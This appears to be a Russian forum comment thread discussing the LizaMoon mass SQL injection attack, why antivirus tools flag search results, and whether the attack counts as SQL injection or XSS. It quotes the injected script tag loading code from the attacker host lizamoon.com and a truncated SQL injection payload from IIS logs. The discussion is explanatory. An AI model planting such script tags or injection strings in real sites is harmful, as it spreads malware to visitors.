Массовое SQL-внедрение скрипта LizaMoon

[Inflame]

Что интересно, почти все инфицированные сайты базируются на технологии ASP(X) и немного ColdFusion.

[Smerig]

угу, а днсы на CNMSN :)
Человек явно любит микрософт.

[googol]

Интересно, это дыра в Microsoft Windows?

[abeshkov]

Судя по новостям это дыра в iTunes.

Вот тут подробнее про атаку www.msnbc.msn.com/id/42361792/ns/technology_and_science-security/

[dmitriid]

желтые заголовки такие желтые

[theOnlyBoy]

вашу ссылку на гугл Нод блокирует )

[fomichev]

И Аваст кричит, что вирус.

Напрашивается вопрос: а как в результатах поиска гугла появляется вредоносный код?..

[fomichev]

Без перехода к указанному файлу ur.php, то бишь без знания антивирусом его содержимого? Я же к самому ur.php не обращаюсь, насколько я понимаю. Обращаюсь к индексу гугла же?

[fomichev]

Ну вот, сломал Аваст, он перестал кричать на страницу гугла.

В любом случае, вот в вашем же сообщении тот же код, и ничего?

[Oblitus]

В сообщении это текст, а не код.

[fomichev]

Просто хочу разобраться, как так происходит.

Сообщение абы откуда не возьмется, это ведь тоже код:

<div class="entry-content-only">
					    Окей, тогда антивирус видит в сырце странице следущий код:
<code>script src=http://lizamoon.com/ur.php</code>

Ваш К.О.
					</div>

Во-вторых, в гугле же, насколько я понимаю, выводятся те же сообщения, только из индекса. Никто к этим файлам не обращается, браузер обращается к странице результатов? Браузер должен сработать на обращение к проблемному файлу, а не на его упоминание, так ведь? Или я чего не понимаю?

[mefcorvi]

Существует такая технология, как предзагрузка страниц (Link prefetching, habrahabr.ru/blogs/google/74123/). Во-всяком случае в хроме когда-то обещали
itc.ua/news/google_rabotaet_nad_uskoreniem_zagruzki_stranic_v_chrome_49877
и в Firefox'е оно должно работать. Я не уверен точно, но возможно антивирусы орут именно из-за link prefetching.

[Harkonnen]

В выдаче гугла это тоже текст, а не код.

[inkvizitor68sl]

About 602,000 results (0.11 seconds)

[pluseg]

А на вид xss.

[demimurych]

Какая разница что инжектить через sql иньекцию?

[akirsanov]

Вот тут побольше информации:
ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.html

[NickolayStrahov]

Объясните плиз, почему SQL-Injection? Я всегда считал что это XSS…

[047]

Таки да. Тоже непонятно, с чего здесь SQL инъекция. При SQL инъекции можно провести XSS, но она не может быть проиндексирована в ПС, если ее явно не опубликовали.

[akirsanov]

потому что уязвимость, с помощью которой скрипт попал в базу, это sql инъекция.

[codecity]

Тема не раскрыта. Дыра в чем?

[akirsanov]

stackoverflow.com/questions/3788080/attack-on-asp-site-that-uses-a-sql-server-database

Here is an example of the value of the cs-uri-query field for one of the IIS log entries.
surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast( --- [SKIPPED] --- ))--

[zanner]

SQL-инекция в том, что внесли этот XSS напрямую в базу, наверно, в обход защит, если таковые имелись.
А вот про XSS — это уже другая тема…

[digreen]

Лучше б рассказали, как они sql-инъекцию туда присунули

[shr]

Наверно, через какую-то дыру в софте на сервере. Судя по первым комментариям этого топика.

[xn__p2a]

> Домен lizamoon.com зарегистрирован четыре дня назад на явно фиктивные данные.
> [тут идёт какая-то сраная картинка]

И вот объясните мне, зачем несколько строк обычного текста (plain text) вставлять в виде картинки? Что помешало текст вставить просто в виде текста?

В следующий раз, пожалуйста, отпринтскринте экран с этим текстом (обязательно весь экран целиком!), сохраните эту картинку через Photoshop, вставьте эту картинку в MS Word, сохраните в виде DOC-файла, заархивируйте этот файл в RAR, залейте его на какой-нибудь поганый файлхостинг и вставьте в статью ссылку на эту файлопомойку.
Мы же айтишники, мы очень любим, когда несколько строчек обычного текста нам передают именно в таком виде.

[kruff]

Адекват?